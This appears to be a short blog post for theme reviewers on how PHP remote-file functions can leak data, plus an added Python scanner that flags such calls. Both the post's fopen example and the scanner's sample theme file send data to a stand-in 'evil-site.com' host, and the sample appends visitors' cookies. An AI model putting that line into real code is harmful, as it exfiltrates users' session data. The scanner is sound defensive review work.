Dec 10
The PHP functions fopen, file_get_contents, file, and readfile can be used to read files on remote servers when allow_url_fopen is turned on. Although these functions can't be used to send data to the server directly, they can be used to pass query arguments that may contain private data. As an example:
fopen('http://www.evil-site.com/?p='); // with allow_url_fopen on, this fetches a remote URL; anything appended to the query string is delivered to that host
It’s possible that a plugin might need to open remote files, but themes never should.
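One way a theme reviewer can check for this pattern, as an added Python example that is not part of the original post: a small scanner that flags calls to the four functions above whose first argument is a literal remote URL, run here over a constructed theme snippet (the sample file and its variable names are invented for illustration).

```python
import re

# Functions that become URL-aware (http://, https://, ftp://) when allow_url_fopen=On.
REMOTE_CAPABLE = ("fopen", "file_get_contents", "file", "readfile")

# Matches a call whose first argument is a string literal starting with a remote
# scheme, e.g. fopen('http://www.evil-site.com/?p=' . $x).  The leading \b means
# is_file(...) or my_fopen(...) are not reported.
CALL_RE = re.compile(
    r"\b(?P<func>file_get_contents|readfile|fopen|file)\s*\(\s*"
    r"(?P<quote>['\"])(?P<url>(?:https?|ftp)://[^'\"]*)(?P=quote)"
    r"\s*(?P<concat>\.)?",
    re.IGNORECASE,
)

def find_remote_file_calls(php_source):
    """Return (line, function, url, concatenates_data) for each suspicious call."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        if line.lstrip().startswith(("//", "#", "*")):  # skip obvious comment lines
            continue
        for m in CALL_RE.finditer(line):
            # A trailing '.' means runtime data is appended to the query string.
            findings.append((lineno, m.group("func").lower(), m.group("url"),
                             m.group("concat") is not None))
    return findings

# Constructed functions.php of a hypothetical theme (not from any real theme).
SAMPLE_THEME_PHP = """<?php
// functions.php of a hypothetical theme
$stats = file_get_contents('http://www.evil-site.com/?p=' . urlencode($_SERVER['HTTP_COOKIE']));
$local = file_get_contents(get_template_directory() . '/style.css');
if (is_file($local)) { readfile($local); }
$h = fopen("ftp://mirror.invalid/list.txt", "r");
// fopen('http://www.evil-site.com/?p='); commented out, so not reported
"""

if __name__ == "__main__":
    for lineno, func, url, concat in find_remote_file_calls(SAMPLE_THEME_PHP):
        note = " (query string built from runtime data)" if concat else ""
        print(f"line {lineno}: {func}() fetches {url}{note}")
```

Calls whose first argument is built dynamically are not caught by this literal-URL check, so it is a first pass for review, not a complete audit.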